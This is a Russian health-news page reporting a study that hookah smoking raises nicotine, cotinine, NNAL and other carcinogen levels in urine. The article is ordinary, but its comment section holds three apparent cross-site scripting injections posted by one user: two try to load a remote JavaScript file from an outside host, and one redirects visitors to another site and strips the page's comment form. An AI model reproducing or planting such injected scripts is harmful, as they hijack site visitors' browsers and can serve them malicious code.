Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кальян вызывает рак! Можн...  >>  Кальян вызывает рак! Можно ли курить дальше?
 
Обратная связь
 

Кальян вызывает рак! Можно ли курить дальше?

Размер шрифта
22 января 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Многие считают кальян практически безвредной альтернативой сигаретам. Однако ученым удалось доказать, что это вовсе не так: курение кальяна наносит нашему организму значительный вред и даже может вызвать зависимость.

Кальян вызывает рак! Можно ли курить дальше?

В организме людей, которые курят кальян, повышен уровень никотина, котинина, летучих органических веществ и различных канцерогенов. В исследовании, опубликованном в журнале Cancer Epidemiology, Biomarkers & Prevention, подробно описан тот вред, который может нанести организму курение кальяна. «Наши данные говорят о том, что во время курения кальяна в кровь попадают вещества, входящие в состав табака, а также некоторые летучие соединения», – рассказывает Гидеон Хелен из отделения клинической фармакологии Университета Калифорнии.

После одного вечера, проведенного в кальянной, у молодых людей было отмечено повышение уровня никотина в моче в 73 раза, уровня котинина – в 4 раза, количество NNAL (продукт распада табака, который увеличивает риск развития рака легких и поджелудочной железы) увеличилось вдвое. Также увеличилось содержание бензена и акролеина – продуктов распада летучих соединений, которые влияют на развитие опухолей и заболеваний сердечно-сосудистой системы и легких. 

«Мы обнаружили значительное повышение уровня никотина в организме, что говорит о возможности возникновения зависимости от курения кальяна», – добавляет Хелен. «Кальяны на воде считаются безопасной альтернативой сигаретам. Наше исследование говорит о том, что курение кальяна, особенно регулярное, вовсе не лишено риска».

В исследовании приняли участие 55 добровольцев в возрасте от 18 до 48 лет, которые регулярно курили кальян. Для участия в эксперименте они воздерживались от курения в течение недели. По окончании этого периода у каждого был взят анализ мочи, после чего все они отправились в кальянную. После этого они снова сдали мочу на анализ. Еще одна проба мочи была взята на следующее утро; это было необходимо для вычисления скорости выведения каждого из веществ из организма участников.

Ученые обнаружили высокое содержание  никотина, котинина и NNAL в моче всех участников сразу после курения. Также оказалось, что содержание этих веществ оставалось высоким и на следующий день по сравнению с тем уровнем, который был зафиксирован после недели воздержания от курения: уровень никотина был выше в 10,4 раза, котинина в 3,2 раза и NNAL в 2,2 раза. Причем содержание никотина после курения кальяна было сопоставимо с тем, которое выявляется после курения обычных сигарет.

«Я наблюдал целые семьи, включая детей, которые курили кальян. Мне даже предлагали закурить мои друзья, которые были уверены, что кальян абсолютно безопасен», – рассказывает доктор Хелен. «Наша работа доказывает, что курение кальяна приводит к вдыханию значительного количества вредных веществ, которые к тому же способны вызвать зависимость».

Так что не стоит тешить себя ложными надеждами о безвредности кальянов. Возможно, пришло время избавиться и от этой вредной привычки.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:21

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все куришь? Только ИНВИТРО заботится о тебе   Три признака того, что ваш ребенок будет курить   Пассивное курение приводит к ожирению!   Протухшие яйца заставят бросить курить!  
06 декабря 2012Теперь бросить курить – проще простого 13 июня 2013Перец, как и сигареты, спасает от Паркинсона!
 
12 августа 2011Курящие женщины чаще умирают от инфарктов, чем мужчины 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Самый легкий орган
Как курение влияет на вашу кожу
Как бросить курить

Тесты

1
Легкие: что вы о них знаете?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.